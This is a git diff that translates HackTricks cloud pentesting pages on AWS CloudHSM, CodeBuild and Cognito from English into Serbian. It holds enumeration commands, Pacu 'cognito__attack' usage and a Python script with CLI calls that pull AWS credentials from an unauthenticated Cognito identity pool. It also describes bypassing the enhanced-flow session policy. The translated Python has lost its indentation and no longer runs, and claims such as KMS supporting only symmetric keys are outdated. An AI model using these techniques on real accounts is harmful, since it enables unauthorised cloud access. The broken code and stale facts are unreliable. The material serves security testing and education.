+Pošto je ovo fizički uređaj posvećen vama, **ključevi se čuvaju na uređaju**. Ključevi treba da budu **replicirani na drugi uređaj**, sačuvani na offline skladištu, ili eksportovani na rezervni uređaj. **Ovaj uređaj nije podržan** od strane S3 ili bilo koje druge usluge na AWS-u kao što je KMS.
 
-In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
+U **CloudHSM-u**, morate **sami skalirati uslugu**. Morate obezbediti dovoljno CloudHSM uređaja da obradite sve vaše potrebe za enkripcijom na osnovu kriptografskih algoritama koje ste izabrali da implementirate za vaše rešenje.\
+Skaliranje usluge za upravljanje ključevima vrši AWS i automatski se skalira na zahtev, tako da kako se vaša upotreba povećava, tako se može povećati i broj CloudHSM uređaja koji su potrebni. Imajte ovo na umu dok skalirate vaše rešenje i ako vaše rešenje ima automatsko skaliranje, uverite se da je vaš maksimalni kapacitet uzet u obzir sa dovoljno CloudHSM uređaja da podrži rešenje.
 
-Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
+Baš kao i skaliranje, **performanse su na vama sa CloudHSM-om**. Performanse variraju u zavisnosti od toga koji kriptografski algoritam se koristi i koliko često treba da pristupite ili preuzmete ključeve za enkripciju podataka. Performanse usluge za upravljanje ključevima se obezbeđuju od strane Amazona i automatski se skaliraju kako to zahteva potražnja. Performanse CloudHSM-a se postižu dodavanjem više uređaja i ako vam je potrebna veća performansa, ili dodajete uređaje ili menjate metodu enkripcije na algoritam koji je brži.
 
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
+Ako je vaše rešenje **multi-region**, trebate dodati nekoliko **CloudHSM uređaja u drugoj regiji i rešiti međuregionalnu povezanost putem privatne VPN veze** ili nekog metoda kako biste osigurali da je saobraćaj uvek zaštićen između uređaja na svakom sloju veze. Ako imate multi-region rešenje, morate razmisliti o tome kako da **replicirate ključeve i postavite dodatne CloudHSM uređaje u regijama u kojima poslujete**. Možete vrlo brzo doći u situaciju gde imate šest ili osam uređaja raspoređenih po više regija, omogućavajući potpunu redundanciju vaših kriptografskih ključeva.
 
-**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
+**CloudHSM** je usluga klase preduzeća za sigurno skladištenje ključeva i može se koristiti kao **root of trust za preduzeće**. Može čuvati privatne ključeve u PKI i ključeve sertifikacione vlasti u X509 implementacijama. Pored simetričnih ključeva koji se koriste u simetričnim algoritmima kao što je AES, **KMS skladišti i fizički štiti samo simetrične ključeve (ne može delovati kao sertifikaciona vlast)**, tako da ako trebate da skladištite PKI i CA ključeve, jedan ili dva ili tri CloudHSM-a bi mogli biti vaše rešenje.
 
-**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
-Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
+**CloudHSM je znatno skuplji od usluge za upravljanje ključevima**. CloudHSM je hardverski uređaj, tako da imate fiksne troškove za obezbeđivanje CloudHSM uređaja, a zatim satni trošak za rad uređaja. Trošak se množi sa onoliko CloudHSM uređaja koliko je potrebno da se postignu vaši specifični zahtevi.\
+Pored toga, treba razmotriti i kupovinu softvera treće strane kao što su SafeNet ProtectV softverski paketi i vreme i trud potrebni za integraciju. Usluga za upravljanje ključevima je zasnovana na upotrebi i zavisi od broja ključeva koje imate i operacija ulaza i izlaza. Kako usluga za upravljanje ključevima obezbeđuje besprekornu integraciju sa mnogim AWS uslugama, troškovi integracije bi trebali biti znatno niži. Troškovi bi trebali biti sekundarni faktor u rešenjima za enkripciju. Enkripcija se obično koristi za sigurnost i usklađenost.
 
-**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
+**Sa CloudHSM-om samo vi imate pristup ključevima** i bez previše detalja, sa CloudHSM-om upravljate svojim ključevima. **Sa KMS-om, vi i Amazon zajednički upravljate vašim ključevima**. AWS ima mnoge politike zaštite od zloupotrebe i **i dalje ne može pristupiti vašim ključevima u bilo kojem rešenju**. Glavna razlika je usklađenost u vezi sa vlasništvom i upravljanjem ključevima, a sa CloudHSM-om, ovo je hardverski uređaj koji vi upravljate i održavate sa ekskluzivnim pristupom samo vama.
 
 ### CloudHSM Suggestions
 
-1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
-3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
-4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
-7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
+1. Uvek implementirajte CloudHSM u **HA postavci** sa najmanje dva uređaja u **odvojenim dostupnim zonama**, a ako je moguće, implementirajte treći ili na lokaciji ili u drugoj regiji na AWS-u.
+2. Budite oprezni prilikom **inicijalizacije** **CloudHSM-a**. Ova akcija **će uništiti ključeve**, tako da ili imajte drugu kopiju ključeva ili budite apsolutno sigurni da ih nemate i nikada, nikada nećete trebati ove ključeve za dekripciju bilo kojih podataka.
+3. CloudHSM samo **podržava određene verzije firmvera** i softvera. Pre nego što izvršite bilo kakvo ažuriranje, uverite se da je firmver i/ili softver podržan od strane AWS-a. Uvek možete kontaktirati AWS podršku da proverite ako je vodič za nadogradnju nejasan.
+4. **Konfiguracija mreže nikada ne bi trebala biti promenjena.** Zapamtite, to je u AWS data centru i AWS prati osnovni hardver za vas. To znači da ako hardver otkaže, oni će ga zameniti za vas, ali samo ako znaju da je otkazao.
+5. **SysLog prosleđivanje ne bi trebalo biti uklonjeno ili promenjeno**. Uvek možete **dodati** SysLog prosleđivač da usmerite logove na vaš vlastiti alat za prikupljanje.
+6. **SNMP** konfiguracija ima iste osnovne restrikcije kao mreža i SysLog folder. Ovo **ne bi trebalo biti promenjeno ili uklonjeno**. Dodatna SNMP konfiguracija je u redu, samo se uverite da ne menjate onu koja je već na uređaju.
+7. Još jedna zanimljiva najbolja praksa od AWS-a je **da ne menjate NTP konfiguraciju**. Nije jasno šta bi se desilo ako to uradite, tako da imajte na umu da ako ne koristite istu NTP konfiguraciju za ostatak vašeg rešenja, mogli biste imati dva izvora vremena. Samo budite svesni toga i znajte da CloudHSM mora ostati sa postojećim NTP izvorom.
 
-The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
+Početna naknada za CloudHSM je 5.000 dolara za dodeljivanje hardverskog uređaja posvećenog vašoj upotrebi, a zatim postoji satna naknada povezana sa radom CloudHSM-a koja trenutno iznosi 1,88 dolara po satu rada, ili otprilike 1.373 dolara mesečno.
 
-The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
+Najčešći razlog za korišćenje CloudHSM-a su standardi usklađenosti koje morate ispuniti iz regulatornih razloga. **KMS ne nudi podršku za podatke za asimetrične ključeve. CloudHSM vam omogućava da sigurno skladištite asimetrične ključeve**.
 
-The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
+**Javni ključ se instalira na HSM uređaju tokom dodeljivanja** tako da možete pristupiti CloudHSM instanci putem SSH.
 
-### What is a Hardware Security Module
+### Šta je Hardverski Bezbednosni Modul
 
-A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+Hardverski bezbednosni modul (HSM) je posvećen kriptografski uređaj koji se koristi za generisanje, skladištenje i upravljanje kriptografskim ključevima i zaštitu osetljivih podataka. Dizajniran je da obezbedi visok nivo sigurnosti fizičkim i elektronskim izolovanjem kriptografskih funkcija od ostatka sistema.
 
-The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
+Način na koji HSM funkcioniše može varirati u zavisnosti od specifičnog modela i proizvođača, ali generalno, sledeći koraci se dešavaju:
 
-1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
-2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
-3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
-4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
-5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+1. **Generisanje ključeva**: HSM generiše nasumični kriptografski ključ koristeći siguran generator nasumičnih brojeva.
+2. **Skladištenje ključeva**: Ključ se **sigurno skladišti unutar HSM-a, gde mu mogu pristupiti samo ovlašćeni korisnici ili procesi**.
+3. **Upravljanje ključevima**: HSM pruža niz funkcija upravljanja ključevima, uključujući rotaciju ključeva, rezervnu kopiju i opoziv.
+4. **Kriptografske operacije**: HSM obavlja niz kriptografskih operacija, uključujući enkripciju, dekripciju, digitalni potpis i razmenu ključeva. Ove operacije se **izvode unutar sigurnog okruženja HSM-a**, što štiti od neovlašćenog pristupa i manipulacije.
+5. **Audit logovanje**: HSM beleži sve kriptografske operacije i pokušaje pristupa, što se može koristiti za usklađenost i bezbednosno reviziju.
 
-HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
+HSM-ovi se mogu koristiti za širok spektar aplikacija, uključujući sigurne online transakcije, digitalne sertifikate, sigurnu komunikaciju i enkripciju podataka. Često se koriste u industrijama koje zahtevaju visok nivo sigurnosti, kao što su finansije, zdravstvo i vlada.
 
-Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
-
-### Enumeration
+Sve u svemu, visok nivo sigurnosti koji pružaju HSM-ovi čini **veoma teškim da se sirovi ključevi izvade iz njih, a pokušaj da se to uradi često se smatra kršenjem sigurnosti**. Međutim, može postojati **određeni scenariji** u kojima bi **sirovi ključ mogao biti izvučen** od strane ovlašćenog osoblja za specifične svrhe, kao što je slučaj postupka oporavka ključeva.
 
+### Enumeracija
 ```
 TODO
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
index bd54cd791..cce645eb9 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
@@ -4,30 +4,29 @@
 
 ## CodeBuild
 
-AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
+AWS **CodeBuild** se prepoznaje kao **potpuno upravljana usluga kontinuirane integracije**. Primarna svrha ove usluge je automatizacija sekvence kompajliranja izvornog koda, izvršavanja testova i pakovanja softvera za svrhe implementacije. Dominantna prednost koju nudi CodeBuild leži u njegovoj sposobnosti da olakša korisnicima potrebu za obezbeđivanjem, upravljanjem i skaliranjem svojih build servera. Ova pogodnost je rezultat toga što sama usluga upravlja tim zadacima. Osnovne karakteristike AWS CodeBuild obuhvataju:
 
-1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
-2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
-3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
+1. **Upravljana usluga**: CodeBuild upravlja i skalira build servere, oslobađajući korisnike od održavanja servera.
+2. **Kontinuirana integracija**: Integrira se sa razvojnim i implementacionim radnim tokom, automatizujući faze build-a i testiranja procesa objavljivanja softvera.
+3. **Proizvodnja paketa**: Nakon faza build-a i testiranja, priprema softverske pakete, čineći ih spremnim za implementaciju.
 
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
+AWS CodeBuild se besprekorno integriše sa drugim AWS uslugama, poboljšavajući efikasnost i pouzdanost CI/CD (Kontinuirana integracija/Kontinuirana implementacija) lanca.
 
-### **Github/Gitlab/Bitbucket Credentials**
+### **Github/Gitlab/Bitbucket akreditivi**
 
-#### **Default source credentials**
+#### **Podrazumevani izvorni akreditivi**
 
-This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
+Ovo je opcija iz nasleđa gde je moguće konfigurisati neki **pristup** (kao što je Github token ili aplikacija) koji će biti **deljen između codebuild projekata** tako da svi projekti mogu koristiti ovaj konfigurisani set akreditiva.
 
-The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
+Skladišteni akreditivi (tokeni, lozinke...) su **upravljao codebuild** i ne postoji javni način da se oni dobiju iz AWS API-ja.
 
-#### Custom source credential
+#### Prilagođeni izvorni akreditiv
 
-Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
+U zavisnosti od platforme repozitorijuma (Github, Gitlab i Bitbucket) pružaju se različite opcije. Ali generalno, svaka opcija koja zahteva **smeštanje tokena ili lozinke će je sačuvati kao tajnu u menadžeru tajni**.
 
-This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
+To omogućava **različitim codebuild projektima da koriste različite konfigurisane pristupe** provajderima umesto da koriste samo konfigurisani podrazumevani. 
 
 ### Enumeration
-
 ```bash
 # List external repo creds (such as github tokens)
 ## It doesn't return the token but just the ARN where it's located
@@ -48,10 +47,9 @@ aws codebuild list-build-batches-for-project --project-name 
 aws codebuild list-reports
 aws codebuild describe-test-cases --report-arn 
 ```
-
 ### Privesc
 
-In the following page, you can check how to **abuse codebuild permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite dozvole za codebuild da biste eskalirali privilegije**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codebuild-privesc.md
@@ -74,7 +72,3 @@ In the following page, you can check how to **abuse codebuild permissions to esc
 - [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
index c870c1791..c6efd5cb0 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
@@ -4,16 +4,16 @@
 
 ## Cognito
 
-Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.
+Amazon Cognito se koristi za **autentifikaciju, autorizaciju i upravljanje korisnicima** u web i mobilnim aplikacijama. Omogućava korisnicima fleksibilnost da se prijave direktno koristeći **korisničko ime i lozinku** ili indirektno putem **treće strane**, uključujući Facebook, Amazon, Google ili Apple.
 
-Central to Amazon Cognito are two primary components:
+Centralni deo Amazon Cognito čine dve glavne komponente:
 
-1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.
-2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.
+1. **User Pools**: Ovo su direktorijumi dizajnirani za korisnike vaše aplikacije, nudeći **funkcionalnosti za registraciju i prijavu**.
+2. **Identity Pools**: Ove grupe su ključne za **autorizaciju korisnika za pristup različitim AWS uslugama**. Nisu direktno uključene u proces prijave ili registracije, ali su od suštinskog značaja za pristup resursima nakon autentifikacije.
 
 ### **User pools**
 
-To learn what is a **Cognito User Pool check**:
+Da biste saznali šta je **Cognito User Pool check**:
 
 {{#ref}}
 cognito-user-pools.md
@@ -21,14 +21,13 @@ cognito-user-pools.md
 
 ### **Identity pools**
 
-The learn what is a **Cognito Identity Pool check**:
+Da biste saznali šta je **Cognito Identity Pool check**:
 
 {{#ref}}
 cognito-identity-pools.md
 {{#endref}}
 
 ## Enumeration
-
 ```bash
 # List Identity Pools
 aws cognito-identity list-identity-pools --max-results 60
@@ -72,14 +71,13 @@ aws cognito-idp get-user-pool-mfa-config --user-pool-id 
 ## Get risk configuration
 aws cognito-idp describe-risk-configuration --user-pool-id 
 ```
+### Identity Pools - Neautentifikovana Enumeracija
 
-### Identity Pools - Unauthenticated Enumeration
+Samo **znajući ID identitetskog bazena** možda ćete moći **dobiti kredencijale uloge povezane sa neautentifikovanim** korisnicima (ako ih ima). [**Proverite kako ovde**](cognito-identity-pools.md#accessing-iam-roles).
 
-Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).
+### User Pools - Neautentifikovana Enumeracija
 
-### User Pools - Unauthenticated Enumeration
-
-Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.**
+Čak i ako **ne znate važeće korisničko ime** unutar Cognita, možda ćete moći da **enumerišete** važeća **korisnička imena**, **BF** **lozinke** ili čak **registrujete novog korisnika** samo **znajući ID klijenta aplikacije** (koji se obično nalazi u izvoru koda). [**Proverite kako ovde**](cognito-user-pools.md#registration)**.**
 
 ## Privesc
 
@@ -87,20 +85,16 @@ Even if you **don't know a valid username** inside Cognito, you might be able to
 ../../aws-privilege-escalation/aws-cognito-privesc.md
 {{#endref}}
 
-## Unauthenticated Access
+## Neautentifikovani Pristup
 
 {{#ref}}
 ../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
 {{#endref}}
 
-## Persistence
+## Postojanost
 
 {{#ref}}
 ../../aws-persistence/aws-cognito-persistence.md
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
index 024c7ea91..1517d0977 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md
@@ -2,16 +2,15 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include:
-
-- Amazon Cognito user pools
-- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple
-- Providers compliant with OpenID Connect (OIDC)
-- SAML (Security Assertion Markup Language) identity providers
-- Developer authenticated identities
+Identity pools igraju ključnu ulogu omogućavajući vašim korisnicima da **dobiju privremene akreditive**. Ovi akreditivi su neophodni za pristup raznim AWS uslugama, uključujući, ali ne ograničavajući se na Amazon S3 i DynamoDB. Istaknuta karakteristika identity pools je njihova podrška za anonimne gostujuće korisnike i niz provajdera identiteta za autentifikaciju korisnika. Podržani provajderi identiteta uključuju:
 
+- Amazon Cognito korisničke pool-ove
+- Opcije prijave putem društvenih mreža kao što su Facebook, Google, Login with Amazon i Sign in with Apple
+- Provajdere koji su u skladu sa OpenID Connect (OIDC)
+- SAML (Security Assertion Markup Language) provajdere identiteta
+- Identitete koje autentifikuje programer
 ```python
 # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
 import boto3
@@ -24,74 +23,64 @@ identity_pool_id = 'your-identity-pool-id'
 
 # Add an identity provider to the identity pool
 response = client.set_identity_pool_roles(
-    IdentityPoolId=identity_pool_id,
-    Roles={
-        'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
-        'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
-    }
+IdentityPoolId=identity_pool_id,
+Roles={
+'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
+'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
+}
 )
 
 # Print the response from AWS
 print(response)
 ```
-
 ### Cognito Sync
 
-To generate Identity Pool sessions, you first need to **generate and Identity ID**. This Identity ID is the **identification of the session of that user**. These identifications can have up to 20 datasets that can store up to 1MB of key-value pairs.
+Da biste generisali sesije Identity Pool-a, prvo morate **generisati Identity ID**. Ovaj Identity ID je **identifikacija sesije tog korisnika**. Ove identifikacije mogu imati do 20 skupova podataka koji mogu čuvati do 1MB parova ključ-vrednost.
 
-This is **useful to keep information of a user** (who will be always using the same Identity ID).
+Ovo je **korisno za čuvanje informacija o korisniku** (koji će uvek koristiti isti Identity ID).
 
-Moreover, the service **cognito-sync** is the service that allow to **manage and syncronize this information** (in the datasets, sending info in streams and SNSs msgs...).
+Pored toga, usluga **cognito-sync** je usluga koja omogućava **upravljanje i sinhronizaciju ovih informacija** (u skupovima podataka, slanje informacija u tokovima i SNS porukama...).
 
 ### Tools for pentesting
 
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), AWS okvir za eksploataciju, sada uključuje module "cognito\_\_enum" i "cognito\_\_attack" koji automatizuju enumeraciju svih Cognito resursa u nalogu i označavaju slabe konfiguracije, atribute korisnika korišćene za kontrolu pristupa itd., kao i automatizuju kreiranje korisnika (uključujući podršku za MFA) i eskalaciju privilegija na osnovu modifikabilnih prilagođenih atributa, upotrebljivih kredencijala identity pool-a, preuzimljivih uloga u id tokenima itd.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+Za opis funkcija modula pogledajte deo 2 [blog posta](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Za uputstva za instalaciju pogledajte glavnu [Pacu](https://github.com/RhinoSecurityLabs/pacu) stranicu.
 
 #### Usage
 
-Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
-
+Primer korišćenja cognito\_\_attack za pokušaj kreiranja korisnika i svih privesc vektora protiv datog identity pool-a i korisničkog pool klijenta:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Primer korišćenja cognito\_\_enum za prikupljanje svih korisničkih bazena, klijenata korisničkih bazena, identitetskih bazena, korisnika itd. vidljivih u trenutnom AWS nalogu:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) je CLI alat u python-u koji implementira različite napade na Cognito, uključujući neželjeno kreiranje naloga i eskalaciju identitetskog bazena.
 
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation.
-
-#### Installation
-
+#### Instalacija
 ```bash
 $ pip install cognito-scanner
 ```
-
-#### Usage
-
+#### Korišćenje
 ```bash
 $ cognito-scanner --help
 ```
+Za više informacija proverite https://github.com/padok-team/cognito-scanner
 
-For more information check https://github.com/padok-team/cognito-scanner
+## Pristup IAM Ulogama
 
-## Accessing IAM Roles
+### Neautentifikovani
 
-### Unauthenticated
-
-The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable).
+Jedina stvar koju napadač treba da zna da bi **dobio AWS kredencijale** u Cognito aplikaciji kao neautentifikovani korisnik je **ID identitetskog bazena**, i ovaj **ID mora biti hardkodiran** u web/mobilnoj **aplikaciji** da bi se koristio. ID izgleda ovako: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (nije moguće izvršiti bruteforce).
 
 > [!TIP]
-> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role`
-
-If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with:
+> **IAM Cognito neautentifikovana uloga kreirana putem** se po defaultu zove `Cognito_Unauth_Role`
 
+Ako pronađete ID identitetskog bazena hardkodiran i omogućava neautentifikovanim korisnicima, možete dobiti AWS kredencijale sa:
 ```python
 import requests
 
@@ -105,8 +94,8 @@ r = requests.post(url, json=params, headers=headers)
 json_resp = r.json()
 
 if not "IdentityId" in json_resp:
-    print(f"Not valid id: {id_pool_id}")
-    exit
+print(f"Not valid id: {id_pool_id}")
+exit
 
 IdentityId = r.json()["IdentityId"]
 
@@ -117,23 +106,19 @@ r = requests.post(url, json=params, headers=headers)
 
 print(r.json())
 ```
-
-Or you could use the following **aws cli commands**:
-
+Ili možete koristiti sledeće **aws cli komande**:
 ```bash
 aws cognito-identity get-id --identity-pool-id  --no-sign
 aws cognito-identity get-credentials-for-identity --identity-id  --no-sign
 ```
-
 > [!WARNING]
-> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section.
+> Imajte na umu da po default-u neautentifikovani cognito **korisnik NE MOŽE imati nikakva ovlašćenja, čak i ako su dodeljena putem politike**. Proverite sledeću sekciju.
 
-### Enhanced vs Basic Authentication flow
+### Poboljšani vs Osnovni tok autentifikacije
 
-The previous section followed the **default enhanced authentication flow**. This flow sets a **restrictive** [**session policy**](../../aws-basic-information/#session-policies) to the IAM role session generated. This policy will only allow the session to [**use the services from this list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (even if the role had access to other services).
-
-However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**.
+Prethodna sekcija je pratila **podrazumevani poboljšani tok autentifikacije**. Ovaj tok postavlja **restriktivnu** [**politiku sesije**](../../aws-basic-information/#session-policies) za IAM ulogu koja je generisana. Ova politika će omogućiti sesiji da [**koristi usluge sa ove liste**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services) (čak i ako je uloga imala pristup drugim uslugama).
 
